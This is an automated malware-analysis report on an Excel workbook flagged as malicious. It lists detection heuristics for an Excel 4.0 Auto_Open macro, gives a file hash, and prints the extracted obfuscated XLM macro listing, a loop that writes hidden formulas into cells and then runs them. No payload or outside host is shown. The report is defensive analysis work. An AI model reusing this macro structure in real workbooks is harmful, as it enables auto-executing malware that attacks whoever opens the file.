MALICIOUS
Risk Score: 140
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6600 bytes |

SHA-256: 95f40ba2d3e09fe770e18bfd8023bb02db8003dba0cc6f17c56e7fc5ca5a577e

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - MZoBOYX
' 0018 26 LABEL : Cell Value, String Constant - aTxRpeClyUY len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G156
' 0018 21 LABEL : Cell Value, String Constant - bclhro len=0
' 0018 21 LABEL : Cell Value, String Constant - EChrTK len=0
' 0018 25 LABEL : Cell Value, String Constant - EmhWlmEbQI len=0
' 0018 20 LABEL : Cell Value, String Constant - FeDls len=0
' 0018 25 LABEL : Cell Value, String Constant - hXthUrzKcZ len=0
' 0018 21 LABEL : Cell Value, String Constant - LKzWQk len=0
' 0018 25 LABEL : Cell Value, String Constant - nCYRTOVNvg len=0
' 0018 27 LABEL : Cell Value, String Constant - OHJyARgSuJMD len=0
' 0018 24 LABEL : Cell Value, String Constant - qORwxlHcC len=0
' 0018 27 LABEL : Cell Value, String Constant - rICeOYhHpbxd len=0
' 0018 24 LABEL : Cell Value, String Constant - rWOWUahJi len=0
' 0018 24 LABEL : Cell Value, String Constant - SyXDlcfbk len=0
' 0018 20 LABEL : Cell Value, String Constant - TelMd len=0
' 0018 27 LABEL : Cell Value, String Constant - ufSKyRYxjroH len=0
' 0018 27 LABEL : Cell Value, String Constant - vfqiwvFPSlKb len=0
' 0018 21 LABEL : Cell Value, String Constant - xhXEMS len=0
' 0018 27 LABEL : Cell Value, String Constant - xuFmzdBDBGKZ len=0
' 0018 23 LABEL : Cell Value, String Constant - zdZvJbVm len=0
' 0018 26 LABEL : Cell Value, String Constant - ZKLiDksZVXo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' MZoBOYX,G57,"SET.NAME("SyXDlcfbk",VALUE("0"))",""
' MZoBOYX,G61,"SET.NAME("ZKLiDksZVXo",SyXDlcfbk)",""
' MZoBOYX,G66,"SET.NAME("aTxRpeClyUY",SyXDlcfbk)",""
' MZoBOYX,G70,"SET.NAME("nCYRTOVNvg",COUNTA(EChrTK))",""
' MZoBOYX,G74,"SET.NAME("EmhWlmEbQI",COUNTA(bclhro))",""
' MZoBOYX,G77,[],""
' MZoBOYX,G79,"SET.NAME("ufSKyRYxjroH","")",""
' MZoBOYX,G81,"ZKLiDksZVXo",""
' MZoBOYX,G85,"SET.NAME("xuFmzdBDBGKZ",HLOOKUP("*",EChrTK,ZKLiDksZVXo,FALSE))",""
' MZoBOYX,G87,"zdZvJbVm",""
' MZoBOYX,G92,"SET.NAME("OHJyARgSuJMD",SyXDlcfbk)",""
' MZoBOYX,G97,[],""
' MZoBOYX,G102,"OHJyARgSuJMD",""
' MZoBOYX,G107,"LKzWQk",""
' MZoBOYX,G111,"TelMd",""
' MZoBOYX,G116,"rWOWUahJi",""
' MZoBOYX,G118,"SET.NAME("hXthUrzKcZ",VALUE(HLOOKUP("*",bclhro,rWOWUahJi,FALSE)))",""
' MZoBOYX,G123,"qORwxlHcC",""
' MZoBOYX,G125,"ufSKyRYxjroH",""
' MZoBOYX,G129,"aTxRpeClyUY",""
' MZoBOYX,G132,NEXT(),""
' MZoBOYX,G137,"rICeOYhHpbxd",""
' MZoBOYX,G142,"SET.NAME("f",INT(T(FORMULA(T(ufSKyRYxjroH)&"",""&T(rICeOYhHpbxd)))))",""
' MZoBOYX,G146,"vfqiwvFPSlKb",""
' MZoBOYX,G150,NEXT(),""
' MZoBOYX,G153,RETURN(),""
' MZoBOYX,G180,"SET.NAME("xhXEMS",G57)",""
' MZoBOYX,G183,"EChrTK",""
' MZoBOYX,G186,"SET.NAME("bclhro",R95C13)",""
' MZoBOYX,G189,"SET.NAME("vfqiwvFPSlKb",197)",""
' MZoBOYX,G191,"SET.NAME("FeDls",7)",""
' MZoBOYX,G196,xhXEMS(),""
' MZoBOYX,G197,HALT(),""